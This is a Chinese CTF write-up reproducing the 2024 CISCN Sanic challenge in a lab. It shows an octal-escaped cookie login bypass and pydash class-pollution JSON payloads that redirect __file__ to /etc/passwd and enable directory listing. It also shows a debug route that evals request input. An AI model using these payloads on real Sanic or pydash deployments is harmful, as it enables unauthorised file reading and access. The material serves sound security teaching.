<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>2024CISCN Sanic复现 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="2024CISCN Sanic复现"><meta property="og:url" content="https://waynejoon.github.io/posts/2024CISCN_Sanic/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-10-08T08:11:46.000Z"><meta property="article:modified_time" content="2025-10-08T08:13:51.752Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="代码审计"><meta property="article:tag" content="Python安全"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/2024CISCN_Sanic/"},"headline":"2024CISCN Sanic复现","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-10-08T08:11:46.000Z","dateModified":"2025-10-08T08:13:51.752Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"Python污染链分析 2024CISCN Sanic复现"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/2024CISCN_Sanic/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-10-08T08:11:46.000Z" title="2025/10/8 16:11:46">2025-10-08</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span><span class="level-item">18 分钟读完 (大约2750个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">2024CISCN Sanic复现</h1><div class="content"><h2 id="Sanic框架介绍"><a href="#Sanic框架介绍" class="headerlink" title="Sanic框架介绍"></a>Sanic框架介绍</h2><p>Sanic 是一个基于 Python 的高性能异步 Web 框架，利用 Python 的 async&#x2F;await 语法实现非阻塞、高并发请求处理。它设计轻量、易用，支持快速定义路由、中间件和 WebSocket，适合构建现代化、响应迅速的 Web 应用和 API，性能在 Python Web 框架中处于领先地位</p>
<p>简单示例</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sanic <span class="keyword">import</span> Sanic</span><br><span class="line"><span class="keyword">from</span> sanic.response <span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line">app = Sanic(<span class="string">&quot;MyApp&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">index</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">return</span> json(&#123;<span class="string">&quot;message&quot;</span>: <span class="string">&quot;Hello, Sanic!&quot;</span>&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&quot;127.0.0.1&quot;</span>, port=<span class="number">8000</span>)</span><br></pre></td></tr></table></figure>

<h2 id="题目复现"><a href="#题目复现" class="headerlink" title="题目复现"></a>题目复现</h2><p>这里我们用ctfshow的环境来复现</p>
<h3 id="起点"><a href="#起点" class="headerlink" title="起点"></a>起点</h3><p>打开网站后访问<code>/src</code>获取源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sanic <span class="keyword">import</span> Sanic</span><br><span class="line"><span class="keyword">from</span> sanic.response <span class="keyword">import</span> text, html</span><br><span class="line"><span class="keyword">from</span> sanic_session <span class="keyword">import</span> Session</span><br><span class="line"><span class="keyword">import</span> pydash</span><br><span class="line"><span class="comment"># pydash==5.1.2</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Pollute</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Sanic(__name__)</span><br><span class="line">app.static(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line">Session(app)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">index</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">return</span> html(<span class="built_in">open</span>(<span class="string">&#x27;static/index.html&#x27;</span>).read())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/login&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">login</span>(<span class="params">request</span>):</span><br><span class="line">    user = request.cookies.get(<span class="string">&quot;user&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> user.lower() == <span class="string">&#x27;adm;n&#x27;</span>:</span><br><span class="line">        request.ctx.session[<span class="string">&#x27;admin&#x27;</span>] = <span class="literal">True</span></span><br><span class="line">        <span class="keyword">return</span> text(<span class="string">&quot;login success&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> text(<span class="string">&quot;login fail&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/src&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">src</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">return</span> text(<span class="built_in">open</span>(__file__).read())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/admin&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">admin</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">if</span> request.ctx.session.get(<span class="string">&#x27;admin&#x27;</span>) == <span class="literal">True</span>:</span><br><span class="line">        key = request.json[<span class="string">&#x27;key&#x27;</span>]</span><br><span class="line">        value = request.json[<span class="string">&#x27;value&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> key <span class="keyword">and</span> value <span class="keyword">and</span> <span class="built_in">type</span>(key) <span class="keyword">is</span> <span class="built_in">str</span> <span class="keyword">and</span> <span class="string">&#x27;_.&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> key:</span><br><span class="line">            pollute = Pollute()</span><br><span class="line">            pydash.set_(pollute, key, value)</span><br><span class="line">            <span class="keyword">return</span> text(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> text(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> text(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>发现<code>/admin</code>路由有<code>pydash.set_(pollute, key, value)</code>，且题目特意标明<code>pydash==5.1.2</code>，网上搜索可知可以用于参数污染，我们尝试污染<code>__file__</code>，但是需要先满足<code>request.ctx.session.get(&#39;admin&#39;) == True</code></p>
<p>先看<code>/login</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/login&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">login</span>(<span class="params">request</span>):</span><br><span class="line">    user = request.cookies.get(<span class="string">&quot;user&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> user.lower() == <span class="string">&#x27;adm;n&#x27;</span>:</span><br><span class="line">        request.ctx.session[<span class="string">&#x27;admin&#x27;</span>] = <span class="literal">True</span></span><br><span class="line">        <span class="keyword">return</span> text(<span class="string">&quot;login success&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> text(<span class="string">&quot;login fail&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>在cookie接受参数user，当<code>user.lower() == &#39;adm;n&#39;</code>时返回true，但是直接传<code>adm;n</code>肯定是不行的，分号会截断内容</p>
<h3 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h3><p>这时我们可以分析一下代码，简单讲一下环境配置</p>
<p>在源码中可以看到导入的依赖文件</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007192145023.png"></p>
<p>先创建并激活虚拟环境</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -m venv venv</span><br><span class="line">venv\Scripts\activate</span><br></pre></td></tr></table></figure>

<p>接着安装依赖</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install sanic sanic-session pydash==5.1.2</span><br></pre></td></tr></table></figure>

<p>然后PyCharm打开<code>site-packages</code>文件即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007193005060.png"></p>
<h3 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h3><p>在<code>sanic/cookies/request.py</code>可以看到有关cookie的解码逻辑</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007203505551.png"></p>
<p>可以看到这里将八进制转换为ASCII编码，然后开头要求字符串两端为双引号，那就很好绕过了，分号的八进制编码为<code>\073</code>，在<code>/login</code>处传入Cookie</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user=&quot;adm\073n&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251007204746604.png"></p>
<p>成功登录</p>
<p>接着就是源码里的<code>if key and value and type(key) is str and &#39;_.&#39; not in key:</code>判断，要求不能出现<code>_.</code>，继续分析代码，在</p>
<p><code>pydash/utilities.py</code>找到方法<code>to_path_tokens</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007211100911.png"></p>
<p>跟进<code>RE_PATH_KEY_DELIM</code>，可以看到</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007215922496.png"></p>
<p>正则里的 <code>(?&lt;!\\)</code> 是“负向零宽断言”，意思是匹配点号的这个位置，前面不能是单个反斜杠 <code>\</code>，然后<code>(?:\\\\)*</code> 是匹配偶数个反斜杠，因为每两个 <code>\</code> 表示一个反斜杠，两个反斜杠的成对出现会让点号有效，也就是说前面有成对的反斜杠不算转义，例如<code>__init__\\\\.__globals__</code>会解析为<code>__init__.__globals__</code>，解析时点号正常分割</p>
<p>那<code>_.</code>的问题就解决了，可以开始进行污染链的构造了</p>
<h3 id="污染链构造"><a href="#污染链构造" class="headerlink" title="污染链构造"></a>污染链构造</h3><p>先在<code>/login</code>处传入Cookie，获取session的值，浏览器会自动保存</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007221858561.png"></p>
<p>接着我们构造链子读取文件，用HackBar的话记得要将enctype改为<code>application/json</code></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.__file__&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="string">&quot;/etc/passwd&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251007223331193.png"></p>
<p>然后重新访问<code>/src</code>目录，成功污染</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007223524013.png"></p>
<p>尝试污染路径为根目录下的flag，发现不行，说明flag要么不在这里要么不叫这个名字，而污染<code>__file__</code>只能是读取文件，那先放着，换个思路试试</p>
<p>继续分析，在源码处可以看到<code>app.static</code>这个注册路由，我们在本地<code>site-packages</code>目录创建个文件（<code>main.py</code>），把题目源码复制进去，方便后续分析</p>
<p>先看看<code>static</code>的定义</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007225310673.png"></p>
<p>在注释处可以看到有两个关键参数说明</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007225407107.png"></p>
<p>意思大概是<code>directory_view</code>为true时，会开启列目录功能，而<code>directory_handler</code>可以获取指定的目录</p>
<p>跟进<code>directory_handler</code>，这里我们要找<code>directory_handler</code>是如何定义的</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007225642416.png"></p>
<p>可以看到有个方法<code>DirectoryHandler</code>，继续跟进看看</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007225800912.png"></p>
<p>成功找到值的初始化定义，我们想办法污染这两个参数，让<code>directory_view</code>为true，然后<code>directory</code>为我们想要的目录</p>
<p>但是我们应该通过什么进行污染，为了进一步分析，我们需要在本地进行调试，这里简单改一下源码（<code>main.py</code>），把鉴权代码全部注释掉方便后续调试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sanic <span class="keyword">import</span> Sanic</span><br><span class="line"><span class="keyword">from</span> sanic.response <span class="keyword">import</span> text, html</span><br><span class="line"><span class="keyword">from</span> sanic_session <span class="keyword">import</span> Session</span><br><span class="line"><span class="keyword">import</span> pydash</span><br><span class="line"><span class="comment"># pydash==5.1.2</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Pollute</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Sanic(__name__)</span><br><span class="line">app.static(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line"><span class="comment"># Session(app)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># @app.route(&#x27;/&#x27;, methods=[&#x27;GET&#x27;, &#x27;POST&#x27;])</span></span><br><span class="line"><span class="comment"># async def index(request):</span></span><br><span class="line"><span class="comment">#     return html(open(&#x27;static/index.html&#x27;).read())</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># @app.route(&quot;/login&quot;)</span></span><br><span class="line"><span class="comment"># async def login(request):</span></span><br><span class="line"><span class="comment">#     user = request.cookies.get(&quot;user&quot;)</span></span><br><span class="line"><span class="comment">#     if user.lower() == &#x27;adm;n&#x27;:</span></span><br><span class="line"><span class="comment">#         request.ctx.session[&#x27;admin&#x27;] = True</span></span><br><span class="line"><span class="comment">#         return text(&quot;login success&quot;)</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment">#     return text(&quot;login fail&quot;)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/src&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">src</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">return</span> text(<span class="built_in">open</span>(__file__).read())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/admin&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">admin</span>(<span class="params">request</span>):</span><br><span class="line"><span class="comment">#    if request.ctx.session.get(&#x27;admin&#x27;) == True:</span></span><br><span class="line">        key = request.json[<span class="string">&#x27;key&#x27;</span>]</span><br><span class="line">        value = request.json[<span class="string">&#x27;value&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> key <span class="keyword">and</span> value <span class="keyword">and</span> <span class="built_in">type</span>(key) <span class="keyword">is</span> <span class="built_in">str</span> <span class="keyword">and</span> <span class="string">&#x27;_.&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> key:</span><br><span class="line">            pollute = Pollute()</span><br><span class="line">            pydash.set_(pollute, key, value)</span><br><span class="line">            <span class="keyword">return</span> text(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> text(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#     return text(&quot;forbidden&quot;)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;127.0.0.1&#x27;</span>, port=<span class="number">8000</span>)<span class="comment"># 修改地址为本地</span></span><br></pre></td></tr></table></figure>

<p>在src处打断点</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008144256970.png"></p>
<p>然后重新访问<code>/src</code>，我们要分析的是与路由有关的方法和变量，需要知道的是，<code>app.router</code> 是 Sanic 中管理所有路由的对象，负责存储和调度请求对应的处理函数，找到<code>app.router</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008144620051.png"></p>
<p>有点多，看着会有点晕，不过因为<code>directory_view</code>是在<code>static</code>方法下，所以我们找有关<code>static</code>的路由即可，发现<code>name_index</code>、<code>routes_all</code>等符合条件</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008150318175.png"></p>
<p>然后我们修改src代码，方便后续调试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/src&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">src</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="built_in">eval</span>(request.args.get(<span class="string">&#x27;code&#x27;</span>))<span class="comment"># 加个eval用于执行代码</span></span><br><span class="line">    <span class="keyword">return</span> text(<span class="built_in">open</span>(__file__).read())</span><br></pre></td></tr></table></figure>

<p><code>name_index</code> 是一个内部字典，键是路由的名字，值是这个路由对应的路由对象。我们可以通过<code>app.router.name_index[]</code>来查看注册路由</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8000/src?code=print(app.router.name_index)</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251007231134991.png"></p>
<p><code>__mp_main__.static</code>对应的路径为<code>static/&lt;__file_uri__:path&gt;</code>，意味着它会匹配 <code>/static/</code> 目录下的文件请求，我们可以通过<code>app.router.name_index[&#39;__mp_main__.static&#39;]</code>查看具体信息</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007231555979.png"></p>
<p>接下来分析如何调用到<code>DirectoryHandler</code>里，全局搜索<code>name_index</code>，看看是如何定义的</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007232207959.png"></p>
<p>我们在这里打个断点，然后回到<code>main.py</code>进行调试分析</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007232429606.png"></p>
<p>可以看到具体的属性</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007233040019.png"></p>
<p>我们直接读取<code>directory_view</code>的值看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1:8000/src?code=print(app.router.name_index[&#x27;__mp_main__.static&#x27;].handler.keywords[&#x27;directory_handler&#x27;].directory_view)</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251007233227292.png"></p>
<p>可以看到返回值为false，尝试污染参数试试，因为<code>__mp_main__.static</code>这个路由名称本身就含有<code>.</code>，点号不是分隔符，因此用两个反斜杠即可</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="literal"><span class="keyword">true</span></span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251007234006016.png"></p>
<p>再次查看参数值，可以看到成功污染</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007234052186.png"></p>
<p>在当前目录新建<code>/static/</code>目录（随便放个文件），然后浏览器访问测试，成功查看到内容</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007234357806.png"></p>
<p>如果我们尝试用<code>routes_all</code>的话会发现不行，可以自行测试看看</p>
<p>接下来就是污染<code>directory</code>的路径，但是却发现报错了</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span><span class="string">&quot;/&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251007235555639.png"></p>
<p>说明不能这样子污染，我们继续调试代码，发现是<code>directory</code>对象的<code>parts</code>属性控制的值，但这是个元组，不能直接修改</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251007235952427.png"></p>
<p>那我们回到<code>directory.py</code>分析<code>directory</code>是如何定义的，可以看到有个<code>Path</code>方法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251008133306093.png"></p>
